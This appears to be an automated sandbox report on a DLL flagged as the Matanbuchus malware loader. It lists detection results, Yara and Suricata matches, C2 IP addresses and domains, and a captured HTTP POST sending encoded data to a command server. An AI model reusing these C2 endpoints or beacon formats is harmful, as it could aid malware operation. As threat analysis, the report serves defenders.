Windows Analysis Report file.dll

Multi AV Scanner detection for dropped file

Source: C:\Users\user\8f08\user-PC\user-PC.ocx

Virustotal: Detection: 16%

Multi AV Scanner detection for submitted file

Source: file.dll

Virustotal: Detection: 16%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Suricata IDS alerts for network traffic

Source: file.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: unknown	HTTPS traffic detected: 193.109.85.27:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49710 version: TLS 1.2

Networking

Source: Network traffic	Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49763 -> 193.109.85.31:54801
Source: Network traffic	Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49994 -> 193.109.85.31:54801

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 193.109.85.27 443			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 193.109.85.31 54801

Detected TCP or UDP traffic on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49994

Source: global traffic

TCP traffic: 192.168.2.7:49763 -> 193.109.85.31:54801

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: M247GB M247GB
Source: Joe Sandbox View	ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_7F3B4560 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,

14_2_7F3B4560

Source: global traffic	HTTP traffic detected: GET /account.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: semurox.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: semurox.com
Source: global traffic	DNS traffic detected: DNS query: vilodeqa.com

Source: unknown

HTTP traffic detected: POST /blueoceansite/templates/docs/index.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Host: vilodeqa.comContent-Length: 581Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CAData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6a 42 73 65 6e 68 79 64 30 39 34 4e 44 52 31 4e 79 74 49 55 32 73 30 4f 58 63 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6e 6f 7a 59 6c 4e 32 51 33 56 4f 4d 33 46 78 55 79 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 56 45 51 30 39 36 4d 31 68 51 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6a 4a 56 4c 32 78 30 5a 33 56 30 4b 30 70 78 64 53 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6e 5a 71 55 30 64 36 57 44 64 4d 49 69 77 69 57 57 74 4b 56 79 49 36 57 79 49 78 52 30 68 6a 49 6c 30 73 49 6d 4e 6d 53 31 67 69 4f 69 4a 31 5a 7a 30 39 49 69 77 69 61 45 35 76 64 6b 70 74 49 6a 6f 69 65 44 49 33 52 47 31 44 52 46 67 31 5a 57 4a 6c 4e 6b 5a 45 4e 7a 46 79 5a 6a 49 35 55 32 68 44 59 33 6c 76 55 44 4a 52 61 30 77 76 5a 45 68 6f 63 48 4e 77 56 57 35 6a 51 56 70 33 4b 7a 42 47 61 31 49 30 50 53 49 73 49 6d 39 43 64 55 31 56 64 53 49 36 49 6a 5a 49 54 46 6c 72 65 6d 6c 69 4d 48 4a 35 56 69 49 73 49 6e 4e 30 64 56 6b 69 4f 69 4a 30 61 6b 64 50 65 6b 45 39 50 53 49 73 49 6e 5a 76 53 6d 4d 69 4f 69 49 72 52 79 38 35 62 6d 63 39 50 53 49 73 49 6e 64 42 59 30 67 69 4f 69 4a 35 52 32 35 61 62 6b 4e 45 54 57 31 6d 4c 31 46 74 65 45 63 31 49 69 77 69 64 31 46 6c 55 6b 67 69 4f 69 4a 31 52 46 4e 59 64 6e 6c 58 54 43 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 6f 79 56 47 46 73 51 30 6b 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 65 6c 52 79 63 6e 46 70 56 31 49 77 4e 6b 4e 4b 4d 6b 64 51 59 58 6c 31 65 6a 45 35 4d 56 70 48 57 6e 70 56 64 43 74 56 5a 46 70 77 4e 44 4e 70 64 45 74 52 55 6a 45 30 63 7a 30 69 66 51 3d 3d Data Ascii: data=eyJBbldGaCI6IjBsenhyd094NDR1NytIU2s0OXc9IiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsIkhkVlFwQSI6InozYlN2Q3VOM3FxUyIsIlFGWnlpaVVYWSI6InVEQ096M1hQIiwiUmJvdCI6IjJVL2x0Z3V0K0pxdSIsIlNiWlduWCI6InZqU0d6WDdMIiwiWWtKVyI6WyIxR0hjIl0sImNmS1giOiJ1Zz09IiwiaE5vdkptIjoieDI3RG1DRFg1ZWJlNkZENzFyZjI5U2hDY3lvUDJRa0wvZEhocHNwVW5jQVp3KzBGa1I0PSIsIm9CdU1VdSI6IjZITFlremliMHJ5ViIsInN0dVkiOiJ0akdPekE9PSIsInZvSmMiOiIrRy85bmc9PSIsIndBY0giOiJ5R25abkNETW1mL1FteEc1Iiwid1FlUkgiOiJ1RFNYdnlXTCIsInhlQ2NqUyI6InoyVGFsQ0k9IiwieWlpVVhZIjoielRycnFpV1IwNkNKMkdQYXl1ejE5MVpHWnpVdCtVZFpwNDNpdEtRUjE0cz0ifQ==

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 193.109.85.27:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49710 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: file.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3A9EF0	14_2_7F3A9EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AFA00	14_2_7F3AFA00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3728BF	14_2_7F3728BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35B5AE	14_2_7F35B5AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36DF4E	14_2_7F36DF4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3BFFE0	14_2_7F3BFFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F39AFC0	14_2_7F39AFC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35ED38	14_2_7F35ED38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36ED68	14_2_7F36ED68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36CD55	14_2_7F36CD55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36CDD8	14_2_7F36CDD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3DDDCB	14_2_7F3DDDCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36CC31	14_2_7F36CC31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35DC1C	14_2_7F35DC1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F39CC60	14_2_7F39CC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F365C4E	14_2_7F365C4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F372CBF	14_2_7F372CBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F372A3F	14_2_7F372A3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F364A3B	14_2_7F364A3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36DA03	14_2_7F36DA03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35DA02	14_2_7F35DA02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3DDA66	14_2_7F3DDA66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3E1ABD	14_2_7F3E1ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3ECAEF	14_2_7F3ECAEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36693B	14_2_7F36693B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D8940	14_2_7F3D8940
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D699D	14_2_7F3D699D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F373992	14_2_7F373992
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35A9E3	14_2_7F35A9E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36A8E8	14_2_7F36A8E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3678CD	14_2_7F3678CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F368670	14_2_7F368670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35A696	14_2_7F35A696
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3DD6D8	14_2_7F3DD6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F397510	14_2_7F397510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F35A430	14_2_7F35A430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36C426	14_2_7F36C426
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36C44C	14_2_7F36C44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36C448	14_2_7F36C448
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3594FF	14_2_7F3594FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36B32B	14_2_7F36B32B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3E53AC	14_2_7F3E53AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D2390	14_2_7F3D2390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F36C27E	14_2_7F36C27E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F364128	14_2_7F364128
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F39F190	14_2_7F39F190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3A8180	14_2_7F3A8180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB9EF0	18_2_7EDB9EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBFA00	18_2_7EDBFA00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED83972	18_2_7ED83972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6B5AE	18_2_7ED6B5AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDAAFC0	18_2_7EDAAFC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDCFFE0	18_2_7EDCFFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7DF4E	18_2_7ED7DF4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED75C4E	18_2_7ED75C4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDACC60	18_2_7EDACC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7CC31	18_2_7ED7CC31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7CDD8	18_2_7ED7CDD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDEDDCB	18_2_7EDEDDCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7CD55	18_2_7ED7CD55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7ED68	18_2_7ED7ED68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6ED38	18_2_7ED6ED38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDFCAEF	18_2_7EDFCAEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF1ABD	18_2_7EDF1ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDEDA66	18_2_7EDEDA66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6DA02	18_2_7ED6DA02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7DA03	18_2_7ED7DA03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED74A3B	18_2_7ED74A3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED778CD	18_2_7ED778CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7A8E8	18_2_7ED7A8E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6A9E3	18_2_7ED6A9E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE699D	18_2_7EDE699D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE8940	18_2_7EDE8940
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7693B	18_2_7ED7693B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDED6D8	18_2_7EDED6D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6A696	18_2_7ED6A696
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED78670	18_2_7ED78670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDCC7B0	18_2_7EDCC7B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED824EC	18_2_7ED824EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED824E2	18_2_7ED824E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7C44C	18_2_7ED7C44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7C448	18_2_7ED7C448
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED6A430	18_2_7ED6A430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7C426	18_2_7ED7C426
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB1540	18_2_7EDB1540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA7510	18_2_7EDA7510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB5520	18_2_7EDB5520
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB32D0	18_2_7EDB32D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7C27E	18_2_7ED7C27E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE2390	18_2_7EDE2390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF53AC	18_2_7EDF53AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED7B32B	18_2_7ED7B32B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDAF190	18_2_7EDAF190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB8180	18_2_7EDB8180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED74128	18_2_7ED74128
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEB9EF0	34_2_7EEB9EF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBFA00	34_2_7EEBFA00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE828BF	34_2_7EE828BF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6B5AE	34_2_7EE6B5AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EECFFE0	34_2_7EECFFE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEAAFC0	34_2_7EEAAFC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7DF4E	34_2_7EE7DF4E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE82CBF	34_2_7EE82CBF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEACC60	34_2_7EEACC60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE75C4E	34_2_7EE75C4E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7CC31	34_2_7EE7CC31
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6DC1C	34_2_7EE6DC1C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEEDDCB	34_2_7EEEDDCB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7CDD8	34_2_7EE7CDD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7ED68	34_2_7EE7ED68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7CD55	34_2_7EE7CD55
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6ED38	34_2_7EE6ED38
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEFCAEF	34_2_7EEFCAEF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEF1ABD	34_2_7EEF1ABD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEEDA66	34_2_7EEEDA66
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE82A3F	34_2_7EE82A3F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE74A3B	34_2_7EE74A3B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6DA02	34_2_7EE6DA02
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7DA03	34_2_7EE7DA03
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7A8E8	34_2_7EE7A8E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE778CD	34_2_7EE778CD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6A9E3	34_2_7EE6A9E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE699D	34_2_7EEE699D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE83992	34_2_7EE83992
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE8940	34_2_7EEE8940
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE7693B	34_2_7EE7693B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEED6D8	34_2_7EEED6D8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE6A696	34_2_7EE6A696
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE78670	34_2_7EE78670
